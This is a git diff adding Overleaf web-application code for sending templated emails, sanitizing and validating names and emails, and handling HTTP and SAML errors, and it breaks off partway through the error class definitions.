require('@overleaf/settings') +const logger = require('@overleaf/logger') +const EmailBuilder = require('./EmailBuilder') +const EmailSender = require('./EmailSender') +const Queues = require('../../infrastructure/Queues') + +const EMAIL_SETTINGS = Settings.email || {} + +/** + * @param {string} emailType + * @param {opts} any + */ +async function sendEmail(emailType, opts) { + const email = EmailBuilder.buildEmail(emailType, opts) + if (email.type === 'lifecycle' && !EMAIL_SETTINGS.lifecycle) { + return + } + opts.html = email.html + opts.text = email.text + opts.subject = email.subject + await EmailSender.promises.sendEmail(opts, emailType) +} + +function sendDeferredEmail(emailType, opts, delay) { + Queues.createScheduledJob( + 'deferred-emails', + { data: { emailType, opts } }, + delay + ).catch(err => { + logger.warn({ err, emailType, opts }, 'failed to queue deferred email') + }) +} + +module.exports = { + sendEmail: callbackify(sendEmail), + sendDeferredEmail, + promises: { + sendEmail, + }, +} diff --git 
a/services/web/app/src/Features/Email/EmailMessageHelper.js b/services/web/app/src/Features/Email/EmailMessageHelper.js new file mode 100644 index 0000000..d8fcc7d --- /dev/null +++ b/services/web/app/src/Features/Email/EmailMessageHelper.js @@ -0,0 +1,28 @@ +const sanitizeHtml = require('sanitize-html') +const sanitizeOptions = { + html: { + allowedTags: ['a', 'span', 'b', 'br', 'i'], + allowedAttributes: { + a: ['href', 'style'], + span: ['style', 'class'], + }, + }, + plainText: { + allowedTags: [], + allowedAttributes: {}, + }, +} + +function cleanHTML(text, isPlainText) { + if (!isPlainText) return sanitizeHtml(text, sanitizeOptions.html) + return sanitizeHtml(text, sanitizeOptions.plainText) +} + +function displayLink(text, url, isPlainText) { + return isPlainText ? `${text} (${url})` : `<a href="${url}">${text}</a>` +} + +module.exports = { + cleanHTML, + displayLink, +} diff --git a/services/web/app/src/Features/Email/EmailOptionsHelper.js b/services/web/app/src/Features/Email/EmailOptionsHelper.js new file mode 100644 index 0000000..e8245f7 --- /dev/null +++ b/services/web/app/src/Features/Email/EmailOptionsHelper.js @@ -0,0 +1,29 @@ +function _getIndefiniteArticle(providerName) { + const vowels = ['a', 'e', 'i', 'o', 'u'] + + return vowels.includes(providerName.charAt(0).toLowerCase()) ? 'an' : 'a' +} + +function _actionBuilder(providerName, action, accountLinked) { + if (providerName.toLowerCase() !== 'google') { + return `${providerName} account ${action}` + } + + return accountLinked ? `New account ${action}` : `Account ${action}` +} + +function linkOrUnlink(accountLinked, providerName, email) { + const action = accountLinked ? 'linked' : 'no longer linked' + const actionDescribed = accountLinked ? 'was linked to' : 'was unlinked from' + const indefiniteArticle = _getIndefiniteArticle(providerName) + + return { + to: email, + action: _actionBuilder(providerName, action, accountLinked), + actionDescribed: `${indefiniteArticle} ${providerName} account ${actionDescribed} your account ${email}`, + } +} + +module.exports = { + linkOrUnlink, +} diff --git a/services/web/app/src/Features/Email/EmailSender.js b/services/web/app/src/Features/Email/EmailSender.js new file mode 100644 index 0000000..c11369c --- /dev/null +++ b/services/web/app/src/Features/Email/EmailSender.js @@ -0,0 +1,128 @@ +const { callbackify } = require('util') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const nodemailer = require('nodemailer') +const sesTransport = require('nodemailer-ses-transport') +const OError = require('@overleaf/o-error') +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const _ = require('lodash') + +const EMAIL_SETTINGS = Settings.email || {} + +module.exports = { + sendEmail: callbackify(sendEmail), + promises: { + sendEmail, + }, +} + +const client = getClient() + +const rateLimiter = new RateLimiter('send_email', { + points: 100, + duration: 3 * 60 * 60, +}) + +function getClient() { + let client + if (EMAIL_SETTINGS.parameters) { + const emailParameters = EMAIL_SETTINGS.parameters + if (emailParameters.AWSAccessKeyID || EMAIL_SETTINGS.driver === 'ses') { + logger.debug('using aws ses for email') + client = nodemailer.createTransport(sesTransport(emailParameters)) + } else if (emailParameters.sendgridApiKey) { + throw new OError( + 'sendgridApiKey configuration option is deprecated, use SMTP instead' + ) + } else if (emailParameters.MandrillApiKey) { + throw new OError( + 
'MandrillApiKey configuration option is deprecated, use SMTP instead' + ) + } else { + logger.debug('using smtp for email') + const smtp = _.pick( + emailParameters, + 'host', + 'port', + 'secure', + 'auth', + 'ignoreTLS', + 'logger', + 'name' + ) + client = nodemailer.createTransport(smtp) + } + } else { + logger.warn( + 'Email transport and/or parameters not defined. No emails will be sent.' + ) + client = { + async sendMail(options) { + logger.info({ options }, 'Would send email if enabled.') + }, + } + } + return client +} + +async function sendEmail(options, emailType) { + try { + const canContinue = await checkCanSendEmail(options) + metrics.inc('email_status', { + status: canContinue ? 'sent' : 'rate_limited', + path: emailType, + }) + if (!canContinue) { + logger.debug( + { + sendingUserId: options.sendingUser_id, + to: options.to, + subject: options.subject, + canContinue, + }, + 'rate limit hit for sending email, not sending' + ) + throw new OError('rate limit hit sending email') + } + metrics.inc('email') + const sendMailOptions = { + to: options.to, + from: EMAIL_SETTINGS.fromAddress || '', + subject: options.subject, + html: options.html, + text: options.text, + replyTo: options.replyTo || EMAIL_SETTINGS.replyToAddress, + socketTimeout: 30 * 1000, + } + if (EMAIL_SETTINGS.textEncoding != null) { + sendMailOptions.textEncoding = EMAIL_SETTINGS.textEncoding + } + if (options.category) { + // category support for sendgrid + sendMailOptions.headers = { + 'X-SMTPAPI': JSON.stringify({ category: options.category }), + } + } + await client.sendMail(sendMailOptions) + } catch (err) { + throw new OError('error sending message').withCause(err) + } +} + +async function checkCanSendEmail(options) { + if (options.sendingUser_id == null) { + // email not sent from user, not rate limited + return true + } + try { + await rateLimiter.consume(options.sendingUser_id, 1, { method: 'userId' }) + } catch (err) { + if (err instanceof Error) { + throw err + } else { + return false + } + } + return true +} diff --git a/services/web/app/src/Features/Email/Layouts/BaseWithHeaderEmailLayout.js b/services/web/app/src/Features/Email/Layouts/BaseWithHeaderEmailLayout.js new file mode 100644 index 0000000..11546e7 --- /dev/null +++ b/services/web/app/src/Features/Email/Layouts/BaseWithHeaderEmailLayout.js @@ -0,0 +1,394 @@ +const _ = require('lodash') +const settings = require('@overleaf/settings') + +module.exports = _.template(`\ +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" +"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> + +<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" style="Margin: 0; background: #E4E8EE !important; margin: 0; min-height: 100%; padding: 0;"> + <head> + <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> + <meta name="viewport" content="width=device-width"> + <style>.button td { + border-radius: 9999px; } + +.force-overleaf-style a, +.force-overleaf-style a[href] { + color: #138A07 !important; + text-decoration: none !important; + -moz-hyphens: none; + -ms-hyphens: none; + -webkit-hyphens: none; + hyphens: none; } + .force-overleaf-style a:visited, + .force-overleaf-style a[href]:visited { + color: #138A07; } + .force-overleaf-style a:hover, + .force-overleaf-style a[href]:hover { + color: #3d7935; } + .force-overleaf-style a:active, + .force-overleaf-style a[href]:active { + color: #3d7935; } +</style> + <style>@media only screen { + html { + min-height: 100%; + background: #f6f6f6; + } +} + +@media only screen and 
(max-width: 596px) { + .small-float-center { + margin: 0 auto !important; + float: none !important; + text-align: center !important; + } + + .small-text-center { + text-align: center !important; + } + + .small-text-left { + text-align: left !important; + } + + .small-text-right { + text-align: right !important; + } + + .cta-table { + table-layout: fixed; + } +} + +@media only screen and (max-width: 596px) { + .hide-for-large { + display: block !important; + width: auto !important; + overflow: visible !important; + max-height: none !important; + font-size: inherit !important; + line-height: inherit !important; + } +} + +@media only screen and (max-width: 596px) { + table.body table.container .hide-for-large, + table.body table.container .row.hide-for-large { + display: table !important; + width: 100% !important; + } +} + +@media only screen and (max-width: 596px) { + table.body table.container .callout-inner.hide-for-large { + display: table-cell !important; + width: 100% !important; + } +} + +@media only screen and (max-width: 596px) { + table.body table.container .show-for-large { + display: none !important; + width: 0; + mso-hide: all; + overflow: hidden; + } +} + +@media only screen and (max-width: 596px) { + table.body img { + width: auto; + height: auto; + } + + table.body center { + min-width: 0 !important; + } + + table.body .container { + width: 95% !important; + } + + table.body .columns, + table.body .column { + height: auto !important; + -moz-box-sizing: border-box; + -webkit-box-sizing: border-box; + box-sizing: border-box; + padding-left: 16px !important; + padding-right: 16px !important; + } + + table.body .columns .column, + table.body .columns .columns, + table.body .column .column, + table.body .column .columns { + padding-left: 0 !important; + padding-right: 0 !important; + } + + table.body .collapse .columns, + table.body .collapse .column { + padding-left: 0 !important; + padding-right: 0 !important; + } + + td.small-1, + th.small-1 { + display: inline-block !important; + width: 8.33333% !important; + } + + td.small-2, + th.small-2 { + display: inline-block !important; + width: 16.66667% !important; + } + + td.small-3, + th.small-3 { + display: inline-block !important; + width: 25% !important; + } + + td.small-4, + th.small-4 { + display: inline-block !important; + width: 33.33333% !important; + } + + td.small-5, + th.small-5 { + display: inline-block !important; + width: 41.66667% !important; + } + + td.small-6, + th.small-6 { + display: inline-block !important; + width: 50% !important; + } + + td.small-7, + th.small-7 { + display: inline-block !important; + width: 58.33333% !important; + } + + td.small-8, + th.small-8 { + display: inline-block !important; + width: 66.66667% !important; + } + + td.small-9, + th.small-9 { + display: inline-block !important; + width: 75% !important; + } + + td.small-10, + th.small-10 { + display: inline-block !important; + width: 83.33333% !important; + } + + td.small-11, + th.small-11 { + display: inline-block !important; + width: 91.66667% !important; + } + + td.small-12, + th.small-12 { + display: inline-block !important; + width: 100% !important; + } + + .columns td.small-12, + .column td.small-12, + .columns th.small-12, + .column th.small-12 { + display: block !important; + width: 100% !important; + } + + table.body td.small-offset-1, + table.body th.small-offset-1 { + margin-left: 8.33333% !important; + Margin-left: 8.33333% !important; + } + + table.body td.small-offset-2, + table.body th.small-offset-2 { + margin-left: 16.66667% 
!important; + Margin-left: 16.66667% !important; + } + + table.body td.small-offset-3, + table.body th.small-offset-3 { + margin-left: 25% !important; + Margin-left: 25% !important; + } + + table.body td.small-offset-4, + table.body th.small-offset-4 { + margin-left: 33.33333% !important; + Margin-left: 33.33333% !important; + } + + table.body td.small-offset-5, + table.body th.small-offset-5 { + margin-left: 41.66667% !important; + Margin-left: 41.66667% !important; + } + + table.body td.small-offset-6, + table.body th.small-offset-6 { + margin-left: 50% !important; + Margin-left: 50% !important; + } + + table.body td.small-offset-7, + table.body th.small-offset-7 { + margin-left: 58.33333% !important; + Margin-left: 58.33333% !important; + } + + table.body td.small-offset-8, + table.body th.small-offset-8 { + margin-left: 66.66667% !important; + Margin-left: 66.66667% !important; + } + + table.body td.small-offset-9, + table.body th.small-offset-9 { + margin-left: 75% !important; + Margin-left: 75% !important; + } + + table.body td.small-offset-10, + table.body th.small-offset-10 { + margin-left: 83.33333% !important; + Margin-left: 83.33333% !important; + } + + table.body td.small-offset-11, + table.body th.small-offset-11 { + margin-left: 91.66667% !important; + Margin-left: 91.66667% !important; + } + + table.body table.columns td.expander, + table.body table.columns th.expander { + display: none !important; + } + + table.body .right-text-pad, + table.body .text-pad-right { + padding-left: 10px !important; + } + + table.body .left-text-pad, + table.body .text-pad-left { + padding-right: 10px !important; + } + + table.menu { + width: 100% !important; + } + + table.menu td, + table.menu th { + width: auto !important; + display: inline-block !important; + } + + table.menu.vertical td, + table.menu.vertical th, + table.menu.small-vertical td, + table.menu.small-vertical th { + display: block !important; + } + + table.menu[align="center"] { + width: auto !important; + } + + table.button.small-expand, + table.button.small-expanded { + width: 100% !important; + } + + table.button.small-expand table, + table.button.small-expanded table { + width: 100%; + } + + table.button.small-expand table a, + table.button.small-expanded table a { + text-align: center !important; + width: 100% !important; + padding-left: 0 !important; + padding-right: 0 !important; + } + + table.button.small-expand center, + table.button.small-expanded center { + min-width: 0; + } +}</style> + </head> + <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bgcolor="#F6F6F6" style="-moz-box-sizing: border-box; -ms-text-size-adjust: 100%; -webkit-box-sizing: border-box; -webkit-text-size-adjust: 100%; Margin: 0; box-sizing: border-box; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0; min-width: 100%; padding: 0; text-align: left; width: 100% !important;"> + <!-- <span class="preheader"></span> --> + <table class="body" border="0" cellspacing="0" cellpadding="0" width="100%" height="100%" style="Margin: 0; background: #E4E8EE; border-collapse: collapse; border-spacing: 0; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; height: 100%; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <td class="body-cell" align="center" valign="top" bgcolor="#F6F6F6" style="-moz-hyphens: auto; 
-webkit-hyphens: auto; Margin: 0; background: #E4E8EE !important; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; padding-bottom: 20px; text-align: left; vertical-align: top; word-wrap: break-word;"> + <center data-parsed="" style="min-width: 580px; width: 100%;"> + + <table align="center" class="wrapper header float-center" style="Margin: 0 auto; background: #1E2530; border-bottom: none; border-collapse: collapse; border-spacing: 0; float: none; margin: 0 auto; padding: 0; text-align: center; vertical-align: top; width: 100%;"><tr style="padding: 0; text-align: left; vertical-align: top;"><td class="wrapper-inner" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 20px; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table align="center" class="container" style="Margin: 0 auto; background: transparent; border-collapse: collapse; border-spacing: 0; margin: 0 auto; padding: 0; text-align: inherit; vertical-align: top; width: 580px;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table class="row collapse" style="border-collapse: collapse; border-spacing: 0; display: table; padding: 0; position: relative; text-align: left; vertical-align: top; width: 100%;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"> + <th class="small-12 large-12 columns first last" style="Margin: 0 auto; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0 auto; padding: 0; padding-bottom: 0; padding-left: 0; padding-right: 0; text-align: left; width: 588px;"><table style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"><tr style="padding: 0; text-align: left; vertical-align: top;"><th style="Margin: 0; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0; padding: 0; text-align: left;"> + <h1 style="Margin: 0; Margin-bottom: px; color: #FFFFFF; font-family: Georgia, serif; font-size: 30px; font-weight: normal; line-height: 1.3; margin: 0; margin-bottom: px; padding: 0; text-align: left; word-wrap: normal;"> + ${settings.appName} + </h1> + </th> + <th class="expander" style="Margin: 0; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0; padding: 0 !important; text-align: left; visibility: hidden; width: 0;"></th></tr></table></th> + </tr></tbody></table> + </td></tr></tbody></table> + </td></tr></table> + <table class="spacer float-center" style="Margin: 0 auto; border-collapse: collapse; border-spacing: 0; float: none; margin: 0 auto; padding: 0; text-align: center; vertical-align: top; width: 100%;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td height="20px" style="-moz-hyphens: auto; 
-webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 20px; font-weight: normal; hyphens: auto; line-height: 20px; margin: 0; mso-line-height-rule: exactly; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> </td></tr></tbody></table> + <table align="center" class="container main float-center" style="Margin: 0 auto; Margin-top: 10px; background: #FFFFFF; border-collapse: collapse; border-spacing: 0; float: none; margin: 0 auto; margin-top: 10px; padding: 0; text-align: center; vertical-align: top; width: 580px;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table class="spacer" style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td height="20px" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 20px; font-weight: normal; hyphens: auto; line-height: 20px; margin: 0; mso-line-height-rule: exactly; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> </td></tr></tbody></table> + + <%= body %> + + <table class="wrapper secondary" align="center" style="background: #E4E8EE; border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"><tr style="padding: 0; text-align: left; vertical-align: top;"><td class="wrapper-inner" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table class="spacer" style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td height="10px" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 10px; font-weight: normal; hyphens: auto; line-height: 10px; margin: 0; mso-line-height-rule: exactly; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> </td></tr></tbody></table> + <p style="Margin: 0; Margin-bottom: 10px; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0; margin-bottom: 10px; padding: 0; text-align: left;"><small style="color: #5D6879; font-size: 80%;"> + ${ + settings.email && + settings.email.template && + settings.email.template.customFooter + ? 
`${settings.email.template.customFooter}<br>` + : '' + }${settings.appName} • <a href="${ + settings.siteUrl + }" style="Margin: 0; color: #0F7A06; font-family: Helvetica, Arial, sans-serif; font-weight: normal; line-height: 1.3; margin: 0; padding: 0; text-align: left; text-decoration: none;">${ + settings.siteUrl + }</a> + </small></p> + </td></tr></table> + </td></tr></tbody></table> + + </center> + </td> + </tr> + </table> + <!-- prevent Gmail on iOS font size manipulation --> + <div style="display:none; white-space:nowrap; font:15px courier; line-height:0;">                                                             </div> + </body> +</html>\ +`) diff --git a/services/web/app/src/Features/Email/SpamSafe.js b/services/web/app/src/Features/Email/SpamSafe.js new file mode 100644 index 0000000..1198099 --- /dev/null +++ b/services/web/app/src/Features/Email/SpamSafe.js @@ -0,0 +1,56 @@ +const XRegExp = require('xregexp') + +// A note about SAFE_REGEX: +// We have to escape the escape characters because XRegExp compiles it first. +// So it's equivalent to `^[\p{L}\p{N}\s\-_!&\(\)]+$] +// \p{L} = any letter in any language +// \p{N} = any kind of numeric character +// https://www.regular-expressions.info/unicode.html#prop is a good resource for +// more obscure regex features. standard RegExp does not support these + +const HAN_REGEX = XRegExp('\\p{Han}') +const SAFE_REGEX = XRegExp("^[\\p{L}\\p{N}\\s\\-_!'&\\(\\)]+$") +const EMAIL_REGEX = XRegExp('^[\\p{L}\\p{N}.+_-]+@[\\w.-]+$') + +const SpamSafe = { + isSafeUserName(name) { + return SAFE_REGEX.test(name) && name.length <= 30 + }, + + isSafeProjectName(name) { + if (HAN_REGEX.test(name)) { + return SAFE_REGEX.test(name) && name.length <= 10 + } + return SAFE_REGEX.test(name) && name.length <= 100 + }, + + isSafeEmail(email) { + return EMAIL_REGEX.test(email) && email.length <= 40 + }, + + safeUserName(name, alternative, project) { + if (project == null) { + project = false + } + if (SpamSafe.isSafeUserName(name)) { + return name + } + return alternative + }, + + safeProjectName(name, alternative) { + if (SpamSafe.isSafeProjectName(name)) { + return name + } + return alternative + }, + + safeEmail(email, alternative) { + if (SpamSafe.isSafeEmail(email)) { + return email + } + return alternative + }, +} + +module.exports = SpamSafe diff --git a/services/web/app/src/Features/Errors/ErrorController.js b/services/web/app/src/Features/Errors/ErrorController.js new file mode 100644 index 0000000..b7f96a8 --- /dev/null +++ b/services/web/app/src/Features/Errors/ErrorController.js @@ -0,0 +1,133 @@ +const Errors = require('./Errors') +const SessionManager = require('../Authentication/SessionManager') +const SamlLogHandler = require('../SamlLog/SamlLogHandler') +const HttpErrorHandler = require('./HttpErrorHandler') +const { plainTextResponse } = require('../../infrastructure/Response') +const { expressifyErrorHandler } = require('@overleaf/promise-utils') + +function notFound(req, res) { + res.status(404) + res.render('general/404', { title: 'page_not_found' }) +} + +function forbidden(req, res) { + res.status(403) + res.render('user/restricted') +} + +function serverError(req, res) { + res.status(500) + res.render('general/500', { title: 'Server Error' }) +} + +async function handleError(error, req, res, next) { + const shouldSendErrorResponse = !res.headersSent + const user = SessionManager.getSessionUser(req.session) + req.logger.addFields({ err: error }) + // log errors related to SAML flow + if (req.session && req.session.saml) { + 
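+      // escalate to error level and persist this request to the SAML audit log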
req.logger.setLevel('error') + await SamlLogHandler.promises.log(req, { error }) + } + if (error.code === 'EBADCSRFTOKEN') { + req.logger.addFields({ user }) + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.sendStatus(403) + } + } else if (error instanceof Errors.NotFoundError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + notFound(req, res) + } + } else if ( + error instanceof URIError && + error.message.match(/^Failed to decode param/) + ) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(400) + res.render('general/500', { title: 'Invalid Error' }) + } + } else if (error instanceof Errors.ForbiddenError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + forbidden(req, res) + } + } else if (error instanceof Errors.TooManyRequestsError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.sendStatus(429) + } + } else if (error instanceof Errors.InvalidError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(400) + plainTextResponse(res, error.message) + } + } else if (error instanceof Errors.DuplicateNameError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(400) + plainTextResponse(res, error.message) + } + } else if (error instanceof Errors.InvalidNameError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(400) + plainTextResponse(res, error.message) + } + } else if (error instanceof Errors.NonDeletableEntityError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(422) + plainTextResponse(res, error.message) + } + } else if (error instanceof Errors.SAMLSessionDataMissing) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + HttpErrorHandler.badRequest(req, res, error.message) + } + } else { + req.logger.setLevel('error') + if (shouldSendErrorResponse) { + serverError(req, res) + } + } + if (!shouldSendErrorResponse) { + // Pass the error to the default Express error handler, which will close + // the connection. 
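+    // (headers were already sent, so we could not render an error page ourselves)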
+ next(error) + } +} + +function handleApiError(err, req, res, next) { + req.logger.addFields({ err }) + if (err instanceof Errors.NotFoundError) { + req.logger.setLevel('warn') + res.sendStatus(404) + } else if ( + err instanceof URIError && + err.message.match(/^Failed to decode param/) + ) { + req.logger.setLevel('warn') + res.sendStatus(400) + } else if (err instanceof Errors.TooManyRequestsError) { + req.logger.setLevel('warn') + res.sendStatus(429) + } else if (err instanceof Errors.ForbiddenError) { + req.logger.setLevel('warn') + res.sendStatus(403) + } else { + req.logger.setLevel('error') + res.sendStatus(500) + } +} + +module.exports = { + notFound, + forbidden, + serverError, + handleError: expressifyErrorHandler(handleError), + handleApiError, +} diff --git a/services/web/app/src/Features/Errors/Errors.js b/services/web/app/src/Features/Errors/Errors.js new file mode 100644 index 0000000..8a21b60 --- /dev/null +++ b/services/web/app/src/Features/Errors/Errors.js @@ -0,0 +1,359 @@ +const OError = require('@overleaf/o-error') +const settings = require('@overleaf/settings') + +// Error class for legacy errors so they inherit OError while staying +// backward-compatible (can be instantiated with string as argument instead +// of object) +class BackwardCompatibleError extends OError { + /** + * @param {string | { message: string, info?: Object }} messageOrOptions + */ + constructor(messageOrOptions) { + if (typeof messageOrOptions === 'string') { + super(messageOrOptions) + } else if (messageOrOptions) { + const { message, info } = messageOrOptions + super(message, info) + } else { + super() + } + } +} + +// Error class that facilitates the migration to OError v3 by providing +// a signature in which the 2nd argument can be an object containing +// the `info` object. 
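+//
+// Illustrative example (not part of the original commit): both calls below
+// attach { userId } to the error as its `info` object.
+//
+//   new OErrorV2CompatibleError('user not found', { info: { userId } })
+//   new OError('user not found', { userId }) // equivalent OError v3 call
+//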
+class OErrorV2CompatibleError extends OError { + constructor(message, options) { + if (options) { + super(message, options.info) + } else { + super(message) + } + } +} + +class NotFoundError extends BackwardCompatibleError {} + +class ForbiddenError extends BackwardCompatibleError {} + +class ServiceNotConfiguredError extends BackwardCompatibleError {} + +class TooManyRequestsError extends BackwardCompatibleError {} + +class DuplicateNameError extends OError {} + +class InvalidNameError extends BackwardCompatibleError {} + +class UnsupportedFileTypeError extends BackwardCompatibleError {} + +class FileTooLargeError extends BackwardCompatibleError {} + +class UnsupportedExportRecordsError extends BackwardCompatibleError {} + +class V1HistoryNotSyncedError extends BackwardCompatibleError {} + +class ProjectHistoryDisabledError extends BackwardCompatibleError {} + +class V1ConnectionError extends BackwardCompatibleError {} + +class UnconfirmedEmailError extends BackwardCompatibleError {} + +class EmailExistsError extends OErrorV2CompatibleError { + constructor(options) { + super('Email already exists', options) + } +} + +class InvalidError extends BackwardCompatibleError {} + +class NotInV2Error extends BackwardCompatibleError {} + +class SLInV2Error extends BackwardCompatibleError {} + +class SAMLCommonsUnavailable extends OError { + get i18nKey() { + return 'saml_commons_unavailable' + } +} + +class SAMLIdentityExistsError extends OError { + get i18nKey() { + return 'institution_account_tried_to_add_already_registered' + } +} + +class SAMLAlreadyLinkedError extends OError { + get i18nKey() { + return 'institution_account_tried_to_add_already_linked' + } +} + +class SAMLEmailNotAffiliatedError extends OError { + get i18nKey() { + return 'institution_account_tried_to_add_not_affiliated' + } +} + +class SAMLEmailAffiliatedWithAnotherInstitutionError extends OError { + get i18nKey() { + return 'institution_account_tried_to_add_affiliated_with_another_institution' + } +} + +class SAMLAuthenticationError extends OError { + get i18nKey() { + return 'saml_auth_error' + } +} +class SAMLAssertionAudienceMismatch extends SAMLAuthenticationError {} + +class SAMLAuthenticationRequiredError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_authentication_required_error' + } +} + +class SAMLGroupSSOLoginIdentityMismatchError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_login_identity_mismatch_error' + } +} + +class SAMLGroupSSOLoginIdentityNotFoundError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_login_identity_not_found_error' + } +} + +class SAMLGroupSSODisabledError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_login_disabled_error' + } +} + +class SAMLInvalidSignatureError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_invalid_signature_error' + } +} + +class SAMLMissingSignatureError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_missing_signature_error' + } +} + +class SAMLInvalidUserIdentifierError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_authentication_required_error' + } +} + +class SAMLInvalidUserAttributeError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_authentication_required_error' + } +} + +class SAMLMissingUserIdentifierError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_missing_user_attribute' + } +} + +class SAMLInvalidResponseError extends SAMLAuthenticationError {} + +class 
SAMLResponseAlreadyProcessedError extends SAMLInvalidResponseError { + constructor() { + super('saml response already processed') + } +} + +class SAMLLoginFailureError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_login_failure' + } +} + +class SAMLEmailNotRecognizedError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_email_not_recognized' + } +} + +class SAMLSessionDataMissing extends BackwardCompatibleError { + constructor(arg) { + super(arg) + + const samlSession = + typeof arg === 'object' && arg !== null && arg.samlSession + ? arg.samlSession + : {} + this.tryAgain = true + const { universityId, universityName, externalUserId, institutionEmail } = + samlSession + + if ( + !universityId && + !universityName && + !externalUserId && + !institutionEmail + ) { + this.message = 'Missing session data.' + } else if ( + !institutionEmail && + samlSession && + samlSession.userEmailAttributeUnreliable + ) { + this.tryAgain = false + this.message = `Your account settings at your institution prevent us from accessing your email address. You will need to make your email address public at your institution in order to link with ${settings.appName}. Please contact your IT department if you have any questions.` + } else if (!institutionEmail) { + this.message = + 'Unable to confirm your institutional email address. The institutional identity provider did not provide an email address in the expected attribute. Please contact us if this keeps happening.' + } + } +} + +class SAMLProviderRequesterError extends SAMLAuthenticationError {} + +class ThirdPartyIdentityExistsError extends BackwardCompatibleError { + constructor(arg) { + super(arg) + if (!this.message) { + this.message = + 'provider and external id already linked to another account' + } + } +} + +class ThirdPartyUserNotFoundError extends BackwardCompatibleError { + constructor(arg) { + super(arg) + if (!this.message) { + this.message = 'user not found for provider and external id' + } + } +} + +class OutputFileFetchFailedError extends OError {} + +class SubscriptionAdminDeletionError extends OErrorV2CompatibleError { + constructor(options) { + super('subscription admins cannot be deleted', options) + } +} + +class SubscriptionNotFoundError extends OErrorV2CompatibleError { + constructor(options) { + super('subscription not found', options) + } +} + +class ProjectNotFoundError extends 